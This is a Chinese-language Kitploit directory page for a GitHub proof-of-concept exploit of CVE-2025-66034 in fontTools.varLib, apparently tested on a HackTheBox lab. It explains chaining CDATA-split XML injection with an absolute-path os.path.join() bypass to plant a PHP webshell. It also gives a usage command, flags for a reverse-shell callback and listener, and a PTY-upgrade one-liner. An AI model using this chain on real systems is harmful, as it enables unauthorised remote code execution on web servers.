Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-66034 — CVE-2025-66034 - fontTools varLib 任意文件写入 → RCE PoC漏洞利用,针对fontTools.varLib中的任意文件写入+XML注入漏洞。 | Kitploit
工具/GitHubGitHub/4nuxd/cve-2025-66034
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试Payload 开发
GitHub4nuxd/cve-2025-66034

CVE-2025-66034

CVE-2025-66034 - fontTools varLib 任意文件写入 → RCE PoC漏洞利用,针对fontTools.varLib中的任意文件写入+XML注入漏洞。

查看仓库
25个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-66034 — fontTools varLib 任意文件写入 → 远程代码执行

针对 fontTools.varLib 中任意文件写入 + XML 注入漏洞的 PoC 利用 已测试于 HackTheBox — VarIaType


漏洞

fontTools.varLib 处理 .designspace XML 文件以构建可变字体。两个弱点组合实现了未授权远程代码执行:

#原语详情
1通过 CDATA 分割实现的 XML 注入攻击者控制的 <labelname> 内部内容被逐字写入输出字体文件主体,允许注入任意数据
2通过 os.path.join() 绕过实现的任意文件写入<variable-font> 的 filename 属性接受绝对路径。当传递给 os.path.join() 时,它会丢弃预期的输出目录并写入攻击者指定的任何文件系统路径

串联两种原语允许将 PHP webshell 写入 Web 可访问路径,从而实现无认证的远程代码执行。


使用方法

root@kitploit:~
python3 font_varlib.py \
  --ip <攻击者-IP> \
  --port <端口> \
  --upload http://target.htb/tools/variable-font-generator/process \
  --webroot /var/www/portal.target.htb/public/files \
  --shell http://portal.target.htb/files

选项

依赖

root@kitploit:~
pip install requests fonttools

工作原理

  1. Master 字体 — 使用 fontTools.FontBuilder 生成两个最小的 .ttf 文件(source-light.ttf、source-regular.ttf)作为 designspace 所需的 master
  2. 恶意 .designspace — 构建一个精心制作的 XML 文件:
    • 通过 <labelname> 内部的 CDATA 分割注入 PHP webshell
    • 将 <variable-font> 的 filename 设置为绝对写入路径,通过 os.path.join() 绕过 output_dir
  3. 上传 — 将 .designspace + master 字体通过 POST 提交至处理端点
  4. 触发 — 访问植入的 .php 文件,执行反弹 Shell 负载
  5. TTY 升级 — 连接后,脚本自动通过 python3 -c 'import pty; pty.spawn("/bin/bash")' 生成 PTY,并设置 + 以获得完全交互式 Shell

披露信息

字段内容
CVECVE-2025-66034
受影响组件fontTools.varLib
影响未认证任意文件写入 → 远程代码执行
上下文公开字体处理端点的 Web 应用程序

法律声明

本工具仅用于授权渗透测试和 CTF 用途。 请勿在您不拥有或未经明确书面许可的系统上运行。


作者 4nuxd

下载工具
标志描述
--ip用于反弹 Shell 回连的攻击者 IP
--port监听端口
--upload字体处理端点的完整 URL(POST)
--webroot服务端绝对路径,映射至 Web 可访问目录
--shellwebshell 可被访问的基础 URL
--no-listen跳过自动监听器 — 改为打印手动命令
--pwncat使用 pwncat-cs 替代 nc(若可用则优先)
TERM
stty